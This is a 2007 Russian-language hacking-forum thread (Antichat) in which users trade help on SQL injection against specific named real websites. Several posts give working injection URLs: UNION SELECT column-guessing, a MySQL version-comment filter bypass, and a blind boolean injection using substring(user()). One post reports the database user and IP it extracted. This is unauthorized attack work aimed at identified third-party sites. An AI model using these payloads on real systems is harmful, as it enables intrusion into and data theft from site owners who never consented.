ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.10.2007, 14:50
Аватар для EST a1ien
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624

Репутация: 114
Отправить сообщение для EST a1ien с помощью ICQ
По умолчанию

Народ благо не создавать новых тем помогите со скулем
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

вот такой запрос непрокатывает( надоело поля подбирать да и неверю что их так много)
Цитата:
http://www.lesprom.ru/html/error.php3?-1'%20union%20select%20null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null/*
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.

Последний раз редактировалось EST a1ien; 23.10.2007 в 14:53..
 
Ответить с цитированием

  #12  
Старый 23.10.2007, 20:03
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от EST a1ien  
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

мускул действительно 3x в нем union select не катит
да и пробелы фильтруются

Код:
http://www.lesprom.ru/html/error.php3?e404'/*!30000asas/*

Цитата:
Сообщение от EST a1ien  
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.

тут у меня не получилось провести инъекцию, хотя ошибка выдается, мож там фильтрация какая нить...

а насчет:
Цитата:
с ордером проблема помогите хотябы поля подобрать.
я вобще не понял о чем ты
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 23.10.2007 в 20:09..
 
Ответить с цитированием

  #13  
Старый 23.10.2007, 20:15
Аватар для rubik-nerubik
rubik-nerubik
Участник форума
Регистрация: 04.05.2007
Сообщений: 267
Провел на форуме:
409147

Репутация: 33
По умолчанию

http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
 
Ответить с цитированием

  #14  
Старый 23.10.2007, 22:02
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

вобщем там mysql 4.1 user()-clubfotonet@81.177.16.192

Это все делается через подзапросы, но в другом параметре:
Код:
http://www.cddj.ru/index.php?productID=1312&picture_id=1420%20and%20substring(user(),25,1)=2/*
вобщем если выражение верное, то загружаются сразу много картинок, в противном случае картинки незагружаются...
версия 4.1 используй подзапросы
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #15  
Старый 23.10.2007, 22:34
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Цитата:
Сообщение от rubik-nerubik  
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
в этом параметре да =)
на полный аудит сайта я не не подписывался =)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #16  
Старый 24.10.2007, 11:55
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Цитата:
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
Когда вас корректно посылают вы не понимаете?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ